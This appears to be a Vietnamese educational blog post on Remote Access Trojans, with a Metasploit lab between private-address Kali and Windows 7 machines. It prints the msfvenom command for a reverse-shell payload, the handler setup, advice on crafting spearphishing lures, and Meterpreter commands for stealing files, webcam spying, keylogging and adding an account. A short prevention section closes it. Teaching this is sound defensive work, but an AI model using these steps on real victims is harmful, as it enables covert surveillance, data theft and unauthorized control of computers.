Post

Remote Access Trojan

Remote Access Trojan

Khái niệm

Remote Access Trojan (RAT) là một phần mềm độc hại giúp hacker chiềm quyền kiểm soát từ xa các thiết bị khi bị lây nhiễm. RAT có khả năng ẩn mình trong hệ thống và thực hiện các hành động mà người dùng không biết.

Phần mềm này thường được phát tán qua email lừa đảo, tải xuống từ các trang web không đáng tin cậy, hoặc thông qua các lỗ hổng bảo mật trong hệ điều hành và ứng dụng. Do đó, người dùng cần cẩn trọng khi mở các liên kết hoặc tệp đính kèm từ nguồn không xác định.

Mục đích sử dụng

  • Lấy cắp các thông tin nhạy cảm trên máy tính của nạn nhân
  • Có thể theo dõi nạn nhân thông qua webcam hoặc ghi lại thao tác bàn phím
  • Có thể dùng để cài thêm các loại như ransomware để mã hóa tống tiền nạn nhân hay backdoor để duy trì truy cập đến máy nạn nhân
  • Điều khiển máy tính của nạn nhân.

Mô phỏng

Sử dụng công cụ metasploit để tiến hành tấn công mô phỏng

Yêu cầu

Ta sẽ sử dụng 2 máy bao gồm:

  1. Máy attacker: Kali Linux, 192.168.174.132
  2. Máy victim: Windows 7, 192.168.174.144

Các bước thực hiện

Bước 1, ta dùng msfvenom để tạo ra một file RAT bằng câu lệnh sau

1
msfvenom -p windows/meterpreter/reverse_tcp -a x86 —platform windows -f exe LHOST=192.168.174.132 LPORT=4444 -o edutech.exe

Trong đó lưu ý:

  • -p là payload mà ta muốn sử dụng
  • -f là format của file được tạo
  • lhost là địa chỉ ip của máy attacker
  • lport là cổng mở trên máy attacker
  • -o là để thiết lập tên file

Bước 2, ta tìm cách để truyền file RAT này sang máy của nạn nhân, thông thường có thể sử dụng 2 cách đó là gửi file đính kèm qua email của nạn nhân hoặc là lừa nạn nhân bấm vào đường dẫn để tải file về. Ở đây ta dùng cách gủi file đính kèm (spearphishing attachment). Để thực hiện điều này thì email cần phải:

  • Nội dung chứa lý do thuyết phục để nạn nhân thục hiện hành vi
  • Địa chỉ email nên gần giống với địa chỉ của các tổ chức ưu tín, nhằm lấy được sự tin cậy từ nạn nhân

Ví dụ nội dung email có thể như sau:

Nội dung email

Bước 3, Nạn nhân tải file đính kèm và thực thi file RAT

Ở phía attacker lúc này cần sử dụng msfconsole và cài đặt:

1
2
3
4
5
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.174.132
set lport 4444
run

Thiết lập msfconsole

Khi nạn nhân thực thi file RAT, một kết nối reverse shell giữa máy attacker và nạn nhân được thiết lập

Tấn công thành công

Khai thác

Khi file RAT đã được thực thi thành công ở phía nạn nhân, ta có thể dùng help để xem các lệnh mà công cụ này có thể dùng

Hành vi 1: Truy cập, tải tài liệu của nạn nhân

Đầu tiên, ta biết Meterpreter cho phép điều hướng bằng các lệnh Linux. Ta có thể chạy lệnh ls để hiển thị các file trong cùng folder với file RAT. Giả sử rằng ở bên máy nạn nhân quét ra các file sau, attacker thấy có file sensitive.txt và muốn lấy nó về máy tính của mình

=> Chạy download sensitive.txt

Download file của nạn nhân

Hành vi 2: Theo dõi nạn nhân qua webcam

Giám sát hoạt động của nạn nhân qua webcam

  • webcam_snap: Chụp một hình ảnh tức thì từ webcam của nạn nhân
  • webcam_stream: Kích hoạt luồng video trực tiếp từ webcam của mục tiêu, cho phép theo dõi hình ảnh thời gian thực

Hành vi 3: Ghi lại thao tác bàn phím

Ta cần thực hiện các bước sau:

  1. Kiểm tra các phiên hoạt động: sessions. Nó giúp ta xem danh sách các phiên Meterpreter đang mở
  2. Để tương tác với phiên, sessions -i <session_ID>
  3. Để kích hoạt keylogger

    • key_scanstart: Lệnh này sẽ bắt đầu ghi lại tất cả các phím mà nạn nhân gõ trên bàn phím.
    • keyscan_dump: Lệnh này sẽ hiển thị tất cả các phím đã được gõ từ khi bạn kích hoạt keyscan_start.
    • keyscan_stop: Lệnh này sẽ dừng quá trình ghi lại các thao tác gõ phím.

Hành vi 4: Leo thang đặc quyền

Sử dụng lệnh shell để truy cập vào cmd của máy victim, check user bằng lệnh net user, thấy mới có tài khoản ban đầu của máy là Vnq003

Trước khi thêm tk mới

Ta tiến hành thêm tài khoản mới bằng net user newaccount attacker /add trong đó:

  • newaccount: tên người dùng
  • attacker: password

Sau khi thêm tk mới

Phòng chống

  • Sử dụng phần mềm diệt virus: Giúp quét và ngăn chặn tệp độc hại thực thi
  • Cảnh giác với các mail lạ: Không mở các mail không được xác định hay download các tệp đính kèm từ mail không xác định
  • Nâng cao nhận thức người dùng: Giúp nhận diện rủi ro, tránh chạy tệp không rõ nguồn gốc.
  • Cập nhật phần mềm: Luôn cập nhật ứng dụng và hệ điều hành phiên bản mới nhất

Ngoài ra để chống phát tấn mã độc, một vài nhà cung cấp dịch vụ email như Gmail đã có chính sách ngăn chặn việc gửi một vài dạng file đính kèm dù đã được zip lại kèm password

Policy

This post is licensed under CC BY 4.0 by the author.